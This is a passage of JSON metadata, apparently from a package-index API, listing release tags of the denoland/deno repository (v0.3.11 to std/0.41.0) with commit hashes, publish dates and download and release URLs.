1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","do